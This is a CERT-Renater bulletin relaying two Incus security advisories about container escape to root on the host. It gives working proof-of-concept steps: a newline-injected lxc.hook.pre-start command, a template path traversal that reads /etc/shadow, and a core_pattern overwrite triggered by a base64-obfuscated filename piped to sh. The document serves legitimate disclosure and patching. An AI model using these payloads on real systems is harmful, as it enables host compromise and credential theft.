Ce mail provient de l'extérieur, restons vigilants ===================================================================== CERT-Renater Note d'Information No. 2026/VULN065 _____________________________________________________________________ DATE : 23/01/2026 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running incusd (Go) versions prior to 6.21.0, 6.0.6. ===================================================================== https://github.com/lxc/incus/security/advisories/GHSA-x6jc-phwx-hp32 https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7 _____________________________________________________________________ Container environment configuration newline injection High stgraber published GHSA-x6jc-phwx-hp32 Jan 22, 2026 Package github.com/lxc/incus/v6/cmd/incusd (Go) Affected versions < v6.21.0 Patched versions v6.21.0, v6.0.6 Description Summary A user with the ability to launch a container with a custom YAML configuration (e.g a member of the ‘incus’ group) can create an environment variable containing newlines, which can be used to add additional configuration items in the container’s lxc.conf due to the newline injection. This can allow adding arbitrary lifecycle hooks, ultimately resulting in arbitrary command execution on the host. Details When passing environment variables in the config block of a new container, values are not checked for the presence of newlines [1], which can result in newline injection inside the generated container lxc.conf. This can be used to set arbitrary additional configuration items, such as lxc.hook.pre-start. By exploiting this, a user with the ability to launch a container with an arbitrary config can achieve arbitrary command execution as root on the host. Exploiting this issue on IncusOS requires a slight modification of the payload to change to a different writable directory for the validation step (e.g /tmp). This can be confirmed with a second container with /tmp mounted from the host (A privileged action for validation only). [1] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers /driver_lxc.go#L1081 PoC A proof-of-concept script exploiting this vulnerability can be found attached, named environment_newline_injection.sh, showing arbitrary command execution, which will write a file to the root filesystem (/newline_injection_command_exec_poc) Manual Reproduction steps: Launch a new container with a configuration file containing a multiline YAML string as an environment variable value, such as in the listing below. Observe that the lxc.conf (/run/incus/user-1000_poc/lxc.conf in my case) contains an additional lxc.hook.pre-start item Observe the creation of the file in the host root directory, with contents proving command execution as root. incus launch images:alpine/edge --ephemeral poc << EOF config: environment.FOO: |- abc lxc.hook.pre-start = /bin/sh -c "id > /newline_injection_command_exec_poc" EOF Impact A user with the ability to launch a container with a custom YAML configuration (e.g a member of the ‘incus’ group) can achieve arbitrary command execution on the host. Attachments environment_newline_injection.sh environment_newline_injection.patch Severity High 8.7/ 10 CVSS v3 base metrics Attack vector Adjacent Attack complexity Low Privileges required Low User interaction None Scope Changed Confidentiality High Integrity High Availability None CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N CVE ID CVE-2026-23953 Weaknesses Weakness CWE-93 Credits @rmcnamara-snyk rmcnamara-snyk Reporter _____________________________________________________________________ Container image templating arbitrary host file read and write High stgraber published GHSA-7f67-crqm-jgh7 Jan 22, 2026 Package github.com/lxc/incus/v6/cmd/incusd (Go) Affected versions < v6.21.0 Patched versions v6.21, v6.0.6 Description Summary A user with the ability to launch a container with a custom image (e.g a member of the ‘incus’ group) can use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write, ultimately resulting in arbitrary command execution on the host. This can also be exploited in IncusOS. Details When using an image with a metadata.yaml containing templates, both the source and target paths are not checked for symbolic links or directory traversal. [1] [2] For example, the following metadata.yaml snippet can read an arbitrary file from the host root filesystem as root, and place it inside the container: templates: /shadow: when: - start template: ../../../../../../../../etc/shadow Additionally, the path of the target of the template is not checked or opened safely, and can therefore contain symbolic links pointing outside the container root filesystem. For example: templates: /realroot/proc/sys/kernel/core_pattern: when: - start template: core_pattern.tpl Where the container root filesystem contains a symbolic link named /realroot pointing to /. This will cause the contents of the template (from the normal "templates" directory in this case) to be written to the host root filesystem as root. This can be exploited to achieve arbitrary command execution on the host by overwriting key files. In the provided proof of concept, I am overwriting /proc/sys/kernel/core_pattern, followed by causing a crash inside the container once launched to execute arbitrary commands on the host. Many other methods are possible depending on the host operating system and configuration. This vulnerability can be exploited by any user who can launch a new container with a custom image. Exploiting this vulnerability on IncusOS requires a slight modification of stage2 to change to a different writable directory for the validation step (e.g /tmp). This can be confirmed with a second container with /tmp mounted from the host (A privileged action for validation only). [1] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers /driver_lxc.go#L7215 [2] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers /driver_lxc.go#L7294 PoC A proof of concept script for the following can be found attached, named template_arbitrary_write.sh, which will show reading of a file from the host filesystem (/etc/shadow), as well as a method for escaping from the container to achieve arbitrary command execution, which will write a file to the root filesystem (/template_arbitrary_write_cmd_exec_poc). Manual Reproduction steps: Obtain and unpack a legitimate root filesystem (e.g alpine/edge) into a directory named rootfs Inside the unpacked root filesystem, create a symbolic link named ‘realroot’ (i.e ln -s / rootfs/realroot) Create a directory named “templates” alongside the rootfs directory. Include a file core_pattern.tpl containing |/bin/sh -c "%E" Additionally, add files segfault.c and stage2 to the root filesystem (listed below), setting stage2 executable (chmod +x rootfs/stage2 Create a metadata.yaml for this image. Sample listed below Create the image archive (tar cf poc.tar *) and import into incus (incus image import poc.tar --alias poc) Launch the newly imported image and obtain a shell (incus launch poc poc --ephemeral; incus shell poc) Observe that the file /shadow inside the container contains the contents of the /etc/shadow file from the host (host file read vulnerability) Compile segfault.c into a file named x$(echo L3Zhci9saWIvaW5jdXMvY29udGFpbmVycy8qL3Jvb3Rmcy9zdGFnZTIK|base64 -d|sh). This filename will be interpolated into the %E value set in the core_pattern by the host file write vulnerability, and will find and execute the stage2 binary inside the container rootfs. Execute the compiled binary (e.g /x*). Observe the creation of the file /template_arbitrary_write_cmd_exec_poc on the host, containing the output of 'id' showing command execution by the host root user. segfault.c: int main() { int *p = 0; *p = 42; return 0; } stage2: #!/bin/sh id > /template_arbitrary_write_cmd_exec_poc metadata.yaml: architecture: x86_64 creation_date: 1 properties: architecture: amd64 description: Exploit os: Exploit release: Exploit 1.0 templates: /shadow: when: - start template: ../../../../../../../../etc/shadow /realroot/proc/sys/kernel/core_pattern: when: - start template: core_pattern.tpl Impact A user with the ability to launch a container with a custom image can achieve arbitrary command execution on the host. Attachments template_arbitrary_write.sh templates_arbitrary_write.patch Severity High 8.7/ 10 CVSS v3 base metrics Attack vector Adjacent Attack complexity Low Privileges required Low User interaction None Scope Changed Confidentiality High Integrity High Availability None CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N CVE ID CVE-2026-23954 Weaknesses Weakness CWE-22 Credits @rmcnamara-snyk rmcnamara-snyk Reporter ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================